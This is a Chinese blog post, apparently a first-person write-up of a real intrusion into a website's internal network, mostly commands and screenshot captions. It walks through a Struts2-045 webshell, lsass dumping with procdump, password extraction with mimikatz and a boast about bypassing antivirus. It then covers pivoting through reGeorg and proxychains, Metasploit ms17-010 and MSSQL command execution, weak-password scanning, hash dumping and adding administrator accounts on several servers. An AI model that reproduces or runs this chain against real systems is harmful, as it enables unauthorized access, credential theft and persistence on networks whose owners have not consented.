记一次内网渗透

前言

某次测试一网站发现struts2-045漏洞。通过翻看文件夹上传文件到不同端口进行访问。

进而getshell菜刀连接。

记一次内网渗透_第1张图片
getshell

同样查看权限,添加用户远程连接。

whoami

在添加到管理员组的时候遇到阻碍。

记一次内网渗透_第2张图片
false

server 2003的服务器。

无法连接

查看进程tasklist。。好像是安全狗。

记一次内网渗透_第3张图片
safedog进程
记一次内网渗透_第4张图片
ipconfig

在经过反复查找资料后,使用Procdump+Mimikatz直接获取管理员的密码。

参考资料:利用Procdump+Mimikatz获取Windows帐户密码

直接上传procdump工具。运行的条件为system。(版本为server 2003,不会被杀)

procdump.exe -accepteula -ma lsass.exe lsass.dmp

记一次内网渗透_第5张图片
procdump.exe

将导出的lsass.dmp文件下载到本地。

这里使用mimikatz工具进行读取密码的时候,出现了错误。

记一次内网渗透_第6张图片
error

解决方法:读取lsass.dmp报错

换一台机器,使用windows server 2003重新进行读取,果然可以。

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

记一次内网渗透_第7张图片
password

获取到的密码进行远程登录。依然不对。

查看一下端口是否被修改。

tasklist  /svc    查看TermService服务

记一次内网渗透_第8张图片
TermService服务

netstat  -ano | find "2212"    查看3389的端口

8103

ok!!!

记一次内网渗透_第9张图片
success

完美绕过卡巴斯基、安全狗。

注:一台服务器多个IP

内网渗透

使用reGeorg+Proxifier进行内网渗透。。

记一次内网渗透_第10张图片
ok

使用kali运行reGeorg文件。

记一次内网渗透_第11张图片
ok

然后配置proxychains。。

vim /etc/proxychains.conf

记一次内网渗透_第12张图片
socks5

就可以将kali的一些工具代理进内网,比如metasploit、nmap。

ms17-010

使用任何工具前面添加proxychains即可。

记一次内网渗透_第13张图片
ok

先对该11.0.0.1/24网段扫描一下ms17-010。。

use  auxiliary/scanner/smb/smb_ms17_010

ms17-010

扫描发现多台服务器存在ms17-010漏洞,但无法反弹shell。。

命令执行

那尝试使用ms17-010的执行系统命令的模块。

use auxiliary/admin/smb/ms17_010_command

options
记一次内网渗透_第14张图片
ok

命令执行批量给几台服务器添加了admin管理员。

记一次内网渗透_第15张图片
域服务

巧合的是该服务器还是域服务器,安装了卡巴斯基杀毒。。导致上传的exe马或mimikatz工具都被杀。

难怪无法反弹shell。。

后发现该网段大部分服务器都打了补丁、装了杀毒。

记一次内网渗透_第16张图片
卡巴斯基

注:使用procdump+mimikatz同样可以获取windows帐户密码

还有一台11.0.0.50服务器。

可以通过rdesktop工具访问。。

proxychains rdesktop -u admin -p 1234qwer.. 11.0.0.50 -g 1024*800

rdesktop
记一次内网渗透_第17张图片
11.0.0.50

该服务器未安装卡巴斯基,可以上传mimikatz工具获取管理员密码。

privilege::debug  提升权限

sekurlsa::logonpasswords  抓取密码

记一次内网渗透_第18张图片
password

存活主机

使用for循环判断该网段存活主机。

for /l  %i  in (1,1,255) do @  ping  11.0.0.%i  -w  1  -n  1 |  find  /i  "ttl="

记一次内网渗透_第19张图片
存活主机

弱口令

可以上传hsscan工具。。扫描该网段常见服务的一些弱口令。

记一次内网渗透_第20张图片
弱口令
记一次内网渗透_第21张图片
ok

配合弱口令,通过msf的mssql一些模块执行命令。

use auxiliary/scanner/mssql/mssql_hashdump

记一次内网渗透_第22张图片
hash

use auxiliary/admin/mssql/mssql_exec

尝试执行系统命令,添加用户。

记一次内网渗透_第23张图片
添加用户
记一次内网渗透_第24张图片
ok

获得11.0.0.18的服务器。

记一次内网渗透_第25张图片
success

你可能感兴趣的:(记一次内网渗透)